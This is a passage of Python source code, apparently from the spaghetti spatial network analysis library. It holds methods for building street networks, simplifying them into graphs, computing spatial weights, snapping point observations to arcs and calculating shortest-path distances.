weights_kws=dict(),
vertex_atol=None,
):
# do this when creating a clean network instance from a
# shapefile or a geopandas.GeoDataFrame, otherwise a shell
# network instance is created (see `split_arcs()` method)
if in_data is not None:
# set parameters as attributes
self.in_data = in_data
self.vertex_sig = vertex_sig
self.vertex_atol = vertex_atol
self.unique_arcs = unique_arcs
self.adjacencylist = defaultdict(list)
self.vertices = {}
# initialize network arcs and arc_lengths
self.arcs = []
self.arc_lengths = {}
# initialize pointpatterns
self.pointpatterns = {}
# spatial representation of the network
self._extractnetwork()
self.arcs = sorted(self.arcs)
self.vertex_coords = dict((v, k) for k, v in self.vertices.items())
# extract connected components
if w_components:
as_graph = False
network_weightings = False
if weightings == True:
# set network arc weights to length if weights are
# desired, but no other input in given
weightings = self.arc_lengths
network_weightings = True
# extract contiguity weights from libpysal
self.w_network = self.contiguityweights(
graph=as_graph,
weightings=weightings,
weights_kws=weights_kws,
)
# identify connected components from the `w_network`
self.identify_components(self.w_network, graph=as_graph)
# extract the graph -- repeat similar as above
# for extracting the network
if extractgraph:
self.extractgraph()
if w_components:
as_graph = True
if network_weightings:
weightings = self.edge_lengths
self.w_graph = self.contiguityweights(
graph=as_graph,
weightings=weightings,
weights_kws=weights_kws,
)
self.identify_components(self.w_graph, graph=as_graph)
# sorted list of vertex IDs
self.vertex_list = sorted(self.vertices.values())
def _round_sig(self, v):
"""Used internally to round the vertex to a set number of
significant digits. If ``sig`` is set to 4, then the following
are some possible results for a coordinate are as follows.
(1) 0.0xxxx, (2) 0.xxxx, (3) x.xxx, (4) xx.xx,
(5) xxx.x, (6) xxxx.0, (7) xxxx0.0
Parameters
----------
v : tuple
Coordinate (x,y) of the vertex.
"""
# set the number of significant digits
sig = self.vertex_sig
# simply return vertex (x,y) coordinates
if sig is None:
return v
# for each coordinate in a coordinate pair
# if the coordinate location is (0.0) simply return zero
# else -- (1) take the absolute value of `val`; (2) take the
# base 10 log for [1]; (3) take the floor of [2]; (4) convert
# [3] into a negative integer; (5) add `sig - 1` to [4];
# (6) round `val` by [5]
out_v = [
val
if val == 0
else round(val, -int(numpy.floor(numpy.log10(numpy.fabs(val)))) + (sig - 1))
for val in v
]
if self.vertex_atol:
out_v = [round(v, self.vertex_atol) for v in out_v]
return tuple(out_v)
def identify_components(self, w, graph=False):
"""Identify connected component information from a
``libpysal.weights.W`` object
Parameters
----------
w : libpysal.weights.W
Weights object created from the network segments (either
raw or graph-theoretic).
graph : bool
Flag for a raw network (``False``) or graph-theoretic network
(``True``). Default is ``False``.
"""
# flag network (arcs) or graph (edges)
if graph:
links = self.edges
obj_type = "graph_"
else:
links = self.arcs
obj_type = "network_"
# connected component count and labels
n_components = w.n_components
component_labels = w.component_labels
# is the network a single, fully-connected component?
if n_components == 1:
fully_connected = True
else:
fully_connected = False
# link to component lookup
link2component = dict(zip(links, component_labels))
# component ID lookups: links, lengths, vertices, vertex counts
component2link = {}
component_lengths = {}
component_vertices = {}
component_vertex_count = {}
cp_labs_ = set(w.component_labels)
l2c_ = link2component.items()
for cpl in cp_labs_:
component2link[cpl] = sorted([k for k, v in l2c_ if v == cpl])
c2l_ = component2link[cpl]
arclens_ = self.arc_lengths.items()
component_lengths[cpl] = sum([v for k, v in arclens_ if k in c2l_])
component_vertices[cpl] = list(set([v for l in c2l_ for v in l]))
component_vertex_count[cpl] = len(component_vertices[cpl])
# longest and largest components
longest_component = max(component_lengths, key=component_lengths.get)
largest_component = max(component_vertex_count, key=component_vertex_count.get)
# component to ring lookup
component_is_ring = {}
adj_ = self.adjacencylist.items()
for comp, verts in component_vertices.items():
component_is_ring[comp] = False
_2neighs = [len(neighs) == 2 for v, neighs in adj_ if v in verts]
if all(_2neighs):
component_is_ring[comp] = True
# attribute label name depends on object type
if graph:
c2l_attr_name = "component2edge"
else:
c2l_attr_name = "component2arc"
# set all new variables into list
extracted_attrs = [
["fully_connected", fully_connected],
["n_components", n_components],
["component_labels", component_labels],
[c2l_attr_name, component2link],
["component_lengths", component_lengths],
["component_vertices", component_vertices],
["component_vertex_count", component_vertex_count],
["longest_component", longest_component],
["largest_component", largest_component],
["component_is_ring", component_is_ring],
]
# iterate over list and set attribute with
# either "network" or "graph" extension
for (attr_str, attr) in extracted_attrs:
setattr(self, obj_type + attr_str, attr)
def _extractnetwork(self):
"""Used internally to extract a network."""
# initialize vertex count
vertex_count = 0
# determine input network data type
in_dtype = str(type(self.in_data)).split("'")[1]
is_libpysal_chains = False
supported_iterables = ["list", "tuple", "numpy.ndarray"]
# type error message
msg = "'%s' not supported for network instantiation."
# set appropriate geometries
if in_dtype == "str":
shps = open(self.in_data)
elif in_dtype in supported_iterables:
shps = self.in_data
shp_type = str(type(shps[0])).split("'")[1]
if shp_type == "libpysal.cg.shapes.Chain":
is_libpysal_chains = True
else:
raise TypeError(msg % shp_type)
elif in_dtype == "libpysal.cg.shapes.Chain":
shps = [self.in_data]
is_libpysal_chains = True
elif in_dtype == "geopandas.geodataframe.GeoDataFrame":
shps = self.in_data.geometry
else:
raise TypeError(msg % in_dtype)
# iterate over each record of the network lines
for shp in shps:
# if the segments are native pysal geometries
if is_libpysal_chains:
vertices = shp.vertices
else:
# fetch all vertices between euclidean segments
# in the line record -- these vertices are
# coordinates in an (x, y) tuple.
vertices = weights._contW_lists._get_verts(shp)
# iterate over each vertex (v)
for i, v in enumerate(vertices[:-1]):
# -- For vertex 1
# adjust precision -- this was originally
# implemented to handle high-precision
# network network vertices
v = self._round_sig(v)
# when the vertex already exists in lookup
# set it as the current `vid`
try:
vid = self.vertices[v]
# when the vertex is not present in the lookup
# add it and adjust vertex count
except KeyError:
self.vertices[v] = vid = vertex_count
vertex_count += 1
# -- For vertex 2
# repeat the steps above for vertex 1
v2 = self._round_sig(vertices[i + 1])
try:
nvid = self.vertices[v2]
except KeyError:
self.vertices[v2] = nvid = vertex_count
vertex_count += 1
# records vertex 1 and vertex 2 adjacency
self.adjacencylist[vid].append(nvid)
self.adjacencylist[nvid].append(vid)
# Sort the edges so that mono-directional
# keys can be stored.
arc_vertices = sorted([vid, nvid])
arc = tuple(arc_vertices)
# record the euclidean arc within the network
self.arcs.append(arc)
# record length
length = util.compute_length(v, vertices[i + 1])
self.arc_lengths[arc] = length
if self.unique_arcs:
# Remove duplicate edges and duplicate adjacent nodes.
self.arcs = list(set(self.arcs))
for k, v in self.adjacencylist.items():
self.adjacencylist[k] = list(set(v))
def extractgraph(self):
"""Using the existing network representation, create a
graph-theoretic representation by removing all vertices with a
neighbor incidence of two (non-articulation points). That is, we
assume these vertices are bridges between vertices with higher
or lower incidence.
"""
# initialize edges and edge_lengths
self.edges = []
self.edge_lengths = {}
# find all vertices with degree 2 that are not in an isolated
# island ring (loop) component. These are non-articulation
# points on the graph representation
non_articulation_points = self._yield_napts()
# retain non_articulation_points as an attribute
self.non_articulation_points = list(non_articulation_points)
# start with a copy of the spatial representation and
# iteratively remove edges deemed to be segments
self.edges = copy.deepcopy(self.arcs)
self.edge_lengths = copy.deepcopy(self.arc_lengths)
# mapping all the 'network arcs' contained within a single
# 'graph represented' edge
self.arcs_to_edges = {}
# build up bridges "rooted" on the initial
# non-articulation points
bridge_roots = []
# iterate over all vertices that are not contained within
# isolated loops that have a degree of 2
for s in non_articulation_points:
# initialize bridge with an articulation point
bridge = [s]
# fetch all vertices adjacent to point `s`
# that are also degree 2
neighbors = self._yieldneighbor(s, non_articulation_points, bridge)
while neighbors:
# extract the current node in `neighbors`
cnode = neighbors.pop()
# remove it from `non_articulation_points`
non_articulation_points.remove(cnode)
# add it to bridge
bridge.append(cnode)
# fetch neighbors for the current node
newneighbors = self._yieldneighbor(
cnode, non_articulation_points, bridge
)
# add the new neighbors back into `neighbors`
neighbors += newneighbors
# once all potential neighbors are exhausted add the
# current bridge of non-articulation points to the
# list of rooted bridges
bridge_roots.append(bridge)
# iterate over the list of newly created rooted bridges
for bridge in bridge_roots:
# if the vertex is only one non-articulation
# point in the bridge
if len(bridge) == 1:
# that the singular element of the bridge
n = self.adjacencylist[bridge[0]]
# and create a new graph edge from it
new_edge = tuple(sorted([n[0], n[1]]))
# identify the arcs to be removed
e1 = tuple(sorted([bridge[0], n[0]]))
e2 = tuple(sorted([bridge[0], n[1]]))
# remove the network arcs (spatial) from the
# graph-theoretic representation
self.edges.remove(e1)
self.edges.remove(e2)
# remove the former network arc lengths from the
# graph edge lengths lookup
length_e1 = self.edge_lengths[e1]
length_e2 = self.edge_lengths[e2]
self.edge_lengths.pop(e1, None)
self.edge_lengths.pop(e2, None)
# and add the new edge length in their place
self.edge_lengths[new_edge] = length_e1 + length_e2
# update the pointers
self.arcs_to_edges[e1] = new_edge
self.arcs_to_edges[e2] = new_edge
# if there are more than one vertices in the bridge
else:
cumulative_length = 0
start_end = {}
# initialize a redundant set of bridge edges
redundant = set([])
# iterate over the current bridge
for b in bridge:
# iterate over each node in the bridge
for n in self.adjacencylist[b]:
# start the bridge with this node
if n not in bridge:
start_end[b] = n
# or create a redundant edge with the current
# node and `b`
else:
redundant.add(tuple(sorted([b, n])))
# initialize a new graph edge
new_edge = tuple(sorted(start_end.values()))
# add start_end redundant edge
for k, v in start_end.items():
redundant.add(tuple(sorted([k, v])))
# remove all redundant network arcs while
# adjusting the graph edge lengths lookup
# and the edges_to_arcs lookup
for r in redundant:
self.edges.remove(r)
cumulative_length += self.edge_lengths[r]
self.edge_lengths.pop(r, None)
self.arcs_to_edges[r] = new_edge
# finally, add the new cumulative edge length
self.edge_lengths[new_edge] = cumulative_length
# add the updated graph edge
self.edges.append(new_edge)
# converted the graph edges into a sorted set to prune out
# duplicate graph edges created during simplification
self.edges = sorted(set(self.edges))
def _yield_napts(self):
"""Find all nodes with degree 2 that are not in an isolated
island ring (loop) component. These are non-articulation
points on the graph representation.
Returns
-------
napts : list
Non-articulation points on a graph representation.
"""
# non-articulation points
napts = set()
# network vertices remaining to evaluate
unvisted = set(self.vertices.values())
while unvisted:
# iterate over each component
for component_id, ring in self.network_component_is_ring.items():
# evaluate for non-articulation points
napts, unvisted = self._evaluate_napts(
napts, unvisted, component_id, ring
)
# convert set of non-articulation points into list
napts = list(napts)
return napts
def _evaluate_napts(self, napts, unvisited, component_id, ring):
"""Evaluate one connected component in a network for
non-articulation points (``napts``) and return an updated set of
``napts`` and unvisted vertices.
Parameters
----------
napts : set
Non-articulation points (``napts``) in the network. The
``napts`` here do not include those within an isolated
loop island.
unvisited : set
Vertices left to evaluate in the network.
component_id : int
ID for the network connected component for the
current iteration of the algorithm.
ring : bool
Network component is isolated island loop ``True`` or
not ``False``.
Returns
-------
napts : set
Updated ``napts`` object.
unvisited : set
Updated ``napts`` object.
"""
# iterate over each `edge` of the `component`
for component in self.network_component2arc[component_id]:
# each `component` has two vertices
for vertex in component:
# if `component` is not an isolated island
# and `vertex` has exactly 2 neighbors,
# add `vertex` to `napts`
if not ring:
if len(self.adjacencylist[vertex]) == 2:
napts.add(vertex)
# remove `vertex` from `unvisited` if
# it is still in the set else move along to
# the next iteration
try:
unvisited.remove(vertex)
except KeyError:
pass
return napts, unvisited
def _yieldneighbor(self, vtx, arc_vertices, bridge):
"""Used internally, this method traverses a bridge arc
to find the source and destination nodes.
Parameters
----------
vtx : int
The vertex ID.
arc_vertices : list
All non-articulation points (``napts``) in the network.
These are referred to as degree-2 vertices.
bridge : list
Inital bridge list containing only ``vtx``.
Returns
-------
nodes : list
Vertices to keep (articulation points). These elements are
referred to as nodes.
"""
# instantiate empty lis to fill with network articulation
# points (nodes with a degree of 1 [endpoints] or greater
# than 2 [intersections])
nodes = []
# get all nodes adjacent to `vtx` that are not in the
# set of 'bridge' vertices
for i in self.adjacencylist[vtx]:
if i in arc_vertices and i not in bridge:
nodes.append(i)
return nodes
def contiguityweights(
self, graph=True, weightings=None, from_split=False, weights_kws=dict()
):
"""Create a contiguity-based ``libpysal.weights.W`` object.
Parameters
----------
graph : bool
Controls whether the ``libpysal.weights.W`` is generated
using the spatial representation (``False``) or the graph
representation (``True``). Default is ``True``.
weightings : {dict, None}
Dictionary of lists of weightings for each arc/edge. Default is ``None``.
from_split : bool
Flag for whether the method is being called from within
``split_arcs()`` (``True``) or not (``False``). Default is ``False``.
weights_kws : dict
Keyword arguments for ``libpysal.weights.W``.
Returns
-------
W : libpysal.weights.W
A ``W`` representing the binary adjacency of the network.
See also
--------
libpysal.weights.W
Examples
--------
Instantiate a network.
>>> import spaghetti
>>> from libpysal import examples
>>> import numpy
>>> ntw = spaghetti.Network(examples.get_path("streets.shp"))
Snap point observations to the network with attribute information.
>>> ntw.snapobservations(
... examples.get_path("crimes.shp"), "crimes", attribute=True
... )
Find counts per network arc.
>>> counts = ntw.count_per_link(
... ntw.pointpatterns["crimes"].obs_to_arc, graph=False
... )
>>> counts[(50, 165)]
4
Create a contiguity-based ``W`` object.
>>> w = ntw.contiguityweights(graph=False)
>>> w.n, w.n_components
(303, 1)
Notes
-----
See :cite:`pysal2007` for more details.
"""
# instantiate OrderedDict to record network link
# adjacency which will be keyed by the link ID (a tuple)
# with values being lists of tuples (contiguous links)
neighbors = OrderedDict()
# flag network (arcs) or graph (edges)
if graph:
links = self.edges
else:
links = self.arcs
# if weightings are desired instantiate a dictionary
# other ignore weightings
if weightings:
_weights = {}
else:
_weights = None
# iterate over all links until all possibilities
# for network link adjacency are exhausted
working = True
while working:
# for each network link (1)
for key in links:
# instantiate a slot in the OrderedDict
neighbors[key] = []
if weightings:
_weights[key] = []
# for each network link (2)
for neigh in links:
# skip if comparing link to itself
if key == neigh:
continue
# if link(1) and link(2) share any vertex
# update neighbors adjacency
if (
key[0] == neigh[0]
or key[0] == neigh[1]
or key[1] == neigh[0]
or key[1] == neigh[1]
):
neighbors[key].append(neigh)
# and add weights if desired
if weightings:
_weights[key].append(weightings[neigh])
# break condition
# -- everything is sorted, so we know when we have
# stepped beyond a possible neighbor
if key[1] > neigh[1]:
working = False
if len(links) == 1 or from_split:
working = False
# call libpysal for `W` instance
weights_kws["weights"] = _weights
w = weights.W(neighbors, **weights_kws)
return w
def distancebandweights(self, threshold, n_processes=1, gen_tree=False):
"""Create distance-based weights.
Parameters
----------
threshold : float
Distance threshold value.
n_processes : {int, str}
Specify the number of cores to utilize. Default is 1 core.
Use ``"all"`` to request all available cores.
Specify the exact number of cores with an integer.
gen_tree : bool
Rebuild shortest path with ``True``, or skip with ``False``.
Default is ``False``.
Returns
-------
w : libpysal.weights.W
A ``W`` object representing the binary adjacency of
the network.
Notes
-----
See :cite:`AnselinRey2014` and :cite:`rey_open_2015` for more details
regarding spatial weights.
See also
--------
libpysal.weights.W
Examples
--------
Instantiate an instance of a network.
>>> import spaghetti
>>> from libpysal import examples
>>> streets_file = examples.get_path("streets.shp")
>>> ntw = spaghetti.Network(in_data=streets_file)
Create a contiguity-based ``W`` object based on network distance, ``500``
`US feet in this case <https://github.com/pysal/libpysal/blob/master/libpysal/examples/geodanet/streets.prj>`_.
>>> w = ntw.distancebandweights(threshold=500)
Show the number of units in the ``W`` object.
>>> w.n
230
There are ``8`` units with ``3`` neighbors in the ``W`` object.
>>> w.histogram[-1]
(8, 3)
"""
# if the a vertex-to-vertex network distance matrix is
# not present in the `network.Network` object; calculate
# one at this point
if not hasattr(self, "distance_matrix"):
self.full_distance_matrix(n_processes, gen_tree=gen_tree)
# identify all network vertices which are within the
# `threshold` parameter
neighbor_query = numpy.where(self.distance_matrix < threshold)
# create an instance for recording neighbors which
# inserts a new key if not present in object
neighbors = defaultdict(list)
# iterate over neighbors within the `threshold`
# and record all network vertices as neighbors
# if the vertex is not being compared to itself
for i, n in enumerate(neighbor_query[0]):
neigh = neighbor_query[1][i]
if n != neigh:
neighbors[n].append(neigh)
# call libpysal for `W` instance
w = weights.W(neighbors)
return w
def snapobservations(self, in_data, name, idvariable=None, attribute=False):
"""Snap a point pattern shapefile to a network object. The
point pattern is stored in the ``network.pointpattern``
attribute of the network object.
Parameters
----------
in_data : {geopandas.GeoDataFrame, str}
The input geographic data. Either (1) a path to a
shapefile (str); or (2) a ``geopandas.GeoDataFrame``.
name : str
Name to be assigned to the point dataset.
idvariable : str
Column name to be used as the ID variable.
attribute : bool
Defines whether attributes should be extracted. ``True`` for
attribute extraction. ``False`` for no attribute extraction.
Default is ``False``.
Notes
-----
See :cite:`doi:10.1111/gean.12211` for a detailed discussion on
the modeling consequences of snapping points to spatial networks.
Examples
--------
Instantiate a network.
>>> import spaghetti
>>> from libpysal import examples
>>> streets_file = examples.get_path("streets.shp")
>>> ntw = spaghetti.Network(in_data=streets_file)
Snap observations to the network.
>>> pt_str = "crimes"
>>> in_data = examples.get_path(pt_str+".shp")
>>> ntw.snapobservations(in_data, pt_str, attribute=True)
Isolate the number of points in the dataset.
>>> ntw.pointpatterns[pt_str].npoints
287
"""
# create attribute of `pointpattern` but instantiating a
# `network.PointPattern` class
self.pointpatterns[name] = PointPattern(
in_data=in_data, idvariable=idvariable, attribute=attribute
)
# allocate the point observations to the nework
self._snap_to_link(self.pointpatterns[name])
def compute_distance_to_vertices(self, x, y, arc):
"""Given an observation on a network arc, return the distance
to the two vertices that bound that end.
Parameters
----------
x : float
The x-coordinate of the snapped point.
y : float
The y-coordinate of the snapped point.
arc : tuple
The (vtx0, vtx1) representation of the network arc.
Returns
-------
d1 : float
The distance to vtx0. Always the vertex with the lesser ID.
d2 : float
The distance to vtx1. Always the vertex with the greater ID.
"""
# distance to vertex 1
d1 = util.compute_length((x, y), self.vertex_coords[arc[0]])
# distance to vertex 2
d2 = util.compute_length((x, y), self.vertex_coords[arc[1]])
return d1, d2
def compute_snap_dist(self, pattern, idx):
"""Given an observation snapped to a network arc, calculate the
distance from the original location to the snapped location.
Parameters
-----------
pattern : spaghetti.PointPattern
The point pattern object.
idx : int
The point ID.
Returns
-------
dist : float
The euclidean distance from original location to the snapped
location.
"""
# set of original (x,y) point coordinates
loc = pattern.points[idx]["coordinates"]
# set of snapped (x,y) point coordinate
snp = pattern.snapped_coordinates[idx]
# distance from the original location to
# the snapped location along the network
dist = util.compute_length(loc, snp)
return dist
def _snap_to_link(self, pointpattern):
"""Used internally to snap point observations to network arcs.
Parameters
-----------
pointpattern : spaghetti.PointPattern
The point pattern object.
Returns
-------
obs_to_arc : dict
Dictionary with arcs as keys and lists of points as values.
arc_to_obs : dict
Dictionary with point IDs as keys and arc tuples as values.
dist_to_vertex : dict
Dictionary with point IDs as keys and values as dictionaries
with keys for vertex IDs and values as distances from point
to vertex.
dist_snapped : dict
Dictionary with point IDs as keys and distance from point
to the network arc that it is snapped.
"""
# instantiate observations snapped coordinates lookup
pointpattern.snapped_coordinates = {}
# record throw-away arcs (pysal.cg.Chain) enumerator
arcs_ = []
# snapped(point)-to-arc lookup
s2a = {}
# iterate over network arc IDs
for arc in self.arcs:
# record the start and end of the arc
head = self.vertex_coords[arc[0]]
tail = self.vertex_coords[arc[1]]
# create a pysal.cg.Chain object of the arc
# and add it to the arcs enumerator
arcs_.append(util._chain_constr(None, [head, tail]))
# add the arc into the snapped(point)-to-arc lookup
s2a[(head, tail)] = arc
# instantiate crosswalks
points = {} # point ID to coordinates lookup
obs_to_arc = {} # observations to arcs lookup
dist_to_vertex = {} # distance to vertices lookup
dist_snapped = {} # snapped distance lookup
# fetch and records point coordinates keyed by ID
for point_idx, point in pointpattern.points.items():
points[point_idx] = point["coordinates"]
# snap point observations to the network
snapped = util.snap_points_to_links(points, arcs_)
# record obs_to_arc, dist_to_vertex, and dist_snapped
# -- iterate over the snapped observation points
for point_idx, snap_info in snapped.items():
# fetch the x and y coordinate
x, y = snap_info[1].tolist()
# look up the arc from snapped(point)-to-arc
arc = s2a[tuple(snap_info[0])]
# add the arc key to observations to arcs lookup
if arc not in obs_to_arc:
obs_to_arc[arc] = {}
# add the (x,y) coordinates of the original observation
# point location to the observations to arcs lookup
obs_to_arc[arc][point_idx] = (x, y)
# add the (x,y) coordinates of the snapped observation
# point location to the snapped coordinates lookup
pointpattern.snapped_coordinates[point_idx] = (x, y)
# calculate the distance to the left and right vertex
# along the network link from the snapped point location
d1, d2 = self.compute_distance_to_vertices(x, y, arc)
# record the distances in the distance to vertices lookup
dist_to_vertex[point_idx] = {arc[0]: d1, arc[1]: d2}
# record the snapped distance
dist_snapped[point_idx] = self.compute_snap_dist(pointpattern, point_idx)
# instantiate observations to network vertex lookup
obs_to_vertex = defaultdict(list)
# iterate over the observations to arcs lookup
for k, v in obs_to_arc.items():
# record the left and right vertex ids
keys = v.keys()
obs_to_vertex[k[0]] = keys
obs_to_vertex[k[1]] = keys
# iterate over components and assign observations
component_to_obs = {}
for comp, _arcids in self.network_component2arc.items():
component_to_obs[comp] = []
for lk, odict in obs_to_arc.items():
if lk in _arcids:
component_to_obs[comp].extend(list(odict.keys()))
# set crosswalks as attributes of the `pointpattern` class
pointpattern.obs_to_arc = obs_to_arc
pointpattern.component_to_obs = component_to_obs
pointpattern.dist_to_vertex = dist_to_vertex
pointpattern.dist_snapped = dist_snapped
pointpattern.obs_to_vertex = list(obs_to_vertex)
def count_per_link(self, obs_on, graph=False):
"""Compute the counts per arc or edge (link).
Parameters
----------
obs_on : dict
Dictionary of observations on the network.
Either in the form ``{(<LINK>):{<POINT_ID>:(<COORDS>)}}``
or ``{<LINK>:[(<COORD>),(<COORD>)]}``.
graph : bool
Count observations on graph edges (``True``) or
network arcs (``False``). Default is ``False``.
Returns
-------
counts : dict
Counts per network link in the form ``{(<LINK>):<COUNT>}``.
Examples
--------
Note that this passes the ``obs_to_arc`` or ``obs_to_edge`` attribute
of a point pattern snapped to the network.
>>> import spaghetti
>>> from libpysal import examples
>>> ntw = spaghetti.Network(examples.get_path("streets.shp"))
Snap observations to the network.
>>> ntw.snapobservations(
... examples.get_path("crimes.shp"), "crimes", attribute=True
... )
>>> counts = ntw.count_per_link(
... ntw.pointpatterns["crimes"].obs_to_arc, graph=False
... )
>>> counts[(140, 142)]
10
>>> s = sum([v for v in list(counts.values())])
>>> s
287
"""
# instantiate observation counts by link lookup
counts = {}
# graph-theoretic object of nodes and edges
if graph:
# iterate the links-to-observations lookup
for key, observations in obs_on.items():
# isolate observation count for the link
cnt = len(observations)
# extract link (edges) key
if key in self.arcs_to_edges.keys():
key = self.arcs_to_edges[key]
# either add to current count or a dictionary
# entry or create new dictionary entry
try:
counts[key] += cnt
except KeyError:
counts[key] = cnt
# network object of arcs and vertices
else:
# simplified version of the above process
for key in obs_on.keys():
counts[key] = len(obs_on[key])
return counts
def _newpoint_coords(self, arc, distance):
"""Used internally to compute new point coordinates during snapping."""
# extract coordinates for vertex 1 of arc
x1 = self.vertex_coords[arc[0]][0]
y1 = self.vertex_coords[arc[0]][1]
# extract coordinates for vertex 2 of arc
x2 = self.vertex_coords[arc[1]][0]
y2 = self.vertex_coords[arc[1]][1]
# if the network arc is vertical set the (x) coordinate
# and proceed to calculating the (y) coordinate
if x1 == x2:
x0 = x1
# if the vertical direction is positive from
# vertex 1 to vertex 2 on the euclidean plane
if y1 < y2:
y0 = y1 + distance
# if the vertical direction is negative from
# vertex 1 to vertex 2 on the euclidean plane
# -- this shouldn't happen due to vertex sorting in
# -- self._extractnetwork() and self.extractgraph()
elif y1 > y2:
y0 = y2 + distance
# otherwise the link is zero-length
# -- this should never happen
else:
y0 = y1
return x0, y0
# calculate the slope of the arc, `m`
m = (y2 - y1) / (x2 - x1)
# if the horizontal direction is negative from
# vertex 1 to vertex 2 on the euclidean plane
if x1 > x2:
x0 = x1 - distance / numpy.sqrt(1 + m ** 2)
# if the horizontal direction is positive from
# vertex 1 to vertex 2 on the euclidean plane
elif x1 < x2:
x0 = x1 + distance / numpy.sqrt(1 + m ** 2)
# calculate the (y) coordinate
y0 = m * (x0 - x1) + y1
# the new (x,y) coordinates for the snapped observation
return x0, y0
def simulate_observations(self, count, distribution="uniform"):
"""Generate a simulated point pattern on the network.
Parameters
----------
count : int
The number of points to create.
distribution : str
A distribution of random points. Currently, the only
supported distribution is uniform.
Returns
-------
random_pts : dict
Keys are the edge tuple. Values are lists of new point coordinates.
See also
--------
numpy.random.Generator.uniform
Examples
--------
Instantiate a network.
>>> import spaghetti
>>> from libpysal import examples
>>> ntw = spaghetti.Network(examples.get_path("streets.shp"))
Snap observations to the network.
>>> ntw.snapobservations(
... examples.get_path("crimes.shp"), "crimes", attribute=True
... )
Isolate the number of points in the dataset.
>>> npts = ntw.pointpatterns["crimes"].npoints
>>> npts
287
Simulate ``npts`` number of points along the network
in a `uniform` distribution.
>>> sim = ntw.simulate_observations(npts)
>>> isinstance(sim, spaghetti.network.SimulatedPointPattern)
True
>>> sim.npoints
287
"""
# instantiate an empty `SimulatedPointPattern()`
simpts = SimulatedPointPattern()
# record throw-away arcs enumerator
arcs_ = []
# create array and fill each entry as length of network arc
lengths = numpy.zeros(len(self.arc_lengths))
for i, key in enumerate(self.arc_lengths.keys()):
arcs_.append(key)
lengths[i] = self.arc_lengths[key]
# cumulative network length
stops = numpy.cumsum(lengths)
cumlen = stops[-1]
# create lengths with a uniform distribution
if distribution.lower() == "uniform":
nrandompts = numpy.random.uniform(0, cumlen, size=(count,))
else:
msg = "%s distribution not currently supported." % distribution
raise RuntimeError(msg)
# iterate over random distances created above
for i, r in enumerate(nrandompts):
# take the first element of the index array (arc ID) where the
# random distance is greater than that of its value in `stops`
idx = numpy.where(r < stops)[0][0]
# assign the simulated point to the arc
assignment_arc = arcs_[idx]
# calculate and set the distance from the arc start
distance_from_start = stops[idx] - r
# populate the coordinates dict
x0, y0 = self._newpoint_coords(assignment_arc, distance_from_start)
# record the snapped coordinates and associated vertices
simpts.snapped_coordinates[i] = (x0, y0)
simpts.obs_to_vertex[assignment_arc[0]].append(i)
simpts.obs_to_vertex[assignment_arc[1]].append(i)
# calculate and set the distance from the arc end
distance_from_end = self.arc_lengths[arcs_[idx]] - distance_from_start
# populate the distances to vertices
simpts.dist_to_vertex[i] = {
assignment_arc[0]: distance_from_start,
assignment_arc[1]: distance_from_end,
}
# set snapped coordinates and point count attributes
simpts.points = simpts.snapped_coordinates
simpts.npoints = len(simpts.points)
return simpts
def enum_links_vertex(self, v0):
"""Returns the arcs (links) adjacent to vertices.
Parameters
-----------
v0 : int
The vertex ID.
Returns
-------
links : list
List of tuple arcs adjacent to the vertex.
Examples
--------
Create an instance of a network.
>>> import spaghetti
>>> from libpysal import examples
>>> ntw = spaghetti.Network(examples.get_path("streets.shp"))
Enumerate the links/arcs that are adjacent to vertex ``24``.
>>> ntw.enum_links_vertex(24)
[(24, 48), (24, 25), (24, 26)]
"""
# instantiate links list
links = []
neighbor_vertices = self.adjacencylist[v0]
# enumerate links associated with the current vertex
for n in neighbor_vertices:
links.append(tuple(sorted([n, v0])))
return links
def full_distance_matrix(self, n_processes, gen_tree=False):
"""All vertex-to-vertex distances on a network. This method
is called from within ``allneighbordistances()``,
``nearestneighbordistances()``, and ``distancebandweights()``.
Parameters
-----------
n_processes : int
Specify the number of cores to utilize. Default is 1 core.
Use ``"all"`` to request all available cores.
Specify the exact number of cores with an integer.
gen_tree : bool
Rebuild shortest path ``True``, or skip ``False``.
Default is ``False``.
Notes
-----
Based on :cite:`Dijkstra1959a` and :cite:`doi:10.1002/9781119967101.ch3`.
"""
# create an empty matrix which will store shortest path distance
nvtx = len(self.vertex_list)
self.distance_matrix = numpy.empty((nvtx, nvtx))
# create `network_trees` attribute that stores
# all network path trees (if desired)
self.network_trees = {}
# single-core processing
if n_processes == 1:
# iterate over each network vertex
for vtx in self.vertex_list:
# calculate the shortest path and preceding
# vertices for traversal route
distance, pred = util.dijkstra(self, vtx)
pred = numpy.array(pred)
# generate the shortest path tree
if gen_tree:
tree = util.generatetree(pred)
else:
tree = None
# populate distances and paths
self.distance_matrix[vtx] = distance
self.network_trees[vtx] = tree
# multiprocessing
else:
# set up multiprocessing schema
import multiprocessing as mp
from itertools import repeat
if n_processes == "all":
cores = mp.cpu_count()
else:
cores = n_processes
p = mp.Pool(processes=cores)
# calculate the shortest path and preceding
# vertices for traversal route by mapping each process
distance_pred = p.map(util.dijkstra_mp, zip(repeat(self), self.vertex_list))
# set range of iterations
iterations = range(len(distance_pred))
# fill shortest paths
distance = [distance_pred[itr][0] for itr in iterations]
# fill preceding vertices
pred = numpy.array([distance_pred[itr][1] for itr in iterations])
# iterate of network vertices and generate
# the shortest path tree for each
for vtx in self.vertex_list:
if gen_tree:
tree = util.generatetree(pred[vtx])
else:
tree = None
# populate distances and paths
self.distance_matrix[vtx] = distance[vtx]
self.network_trees[vtx] = tree
def allneighbordistances(
self,
sourcepattern,
destpattern=None,
fill_diagonal=None,
n_processes=1,
gen_tree=False,
snap_dist=False,
):
"""Compute either all distances between :math:`i` and :math:`j` in a
single point pattern or all distances between each :math:`i` from a
source pattern and all :math:`j` from a destination pattern.
Parameters
----------
sourcepattern : {str, spaghetti.PointPattern}
The key of a point pattern snapped to the network or
the full ``spaghetti.PointPattern`` object.
destpattern : str
(Optional) The key of a point pattern snapped to the network
or the full ``spaghetti.PointPattern`` object.
fill_diagonal : {float, int}
(Optional) Fill the diagonal of the cost matrix. Default is
``None`` and will populate the diagonal with ``numpy.nan``.
Do not declare a ``destpattern`` for a custom
``fill_diagonal``.
n_processes : {int, str}
Specify the number of cores to utilize. Default is 1 core.
Use ``"all"`` to request all available cores.
Specify the exact number of cores with an integer.
gen_tree : bool
Rebuild shortest path ``True``, or skip ``False``.
Default is ``False``.
snap_dist : bool
Flag as ``True`` to include the distance from the original
location to the snapped location along the network. Default
is ``False``.
Returns
-------
nearest : numpy.ndarray
An array of shape (n,m) storing distances between all
source and destination points.
tree_nearest : dict
Nearest network node to point pattern vertex shortest
path lookup. The values of the dictionary are a tuple
of the nearest source vertex and the nearest destination
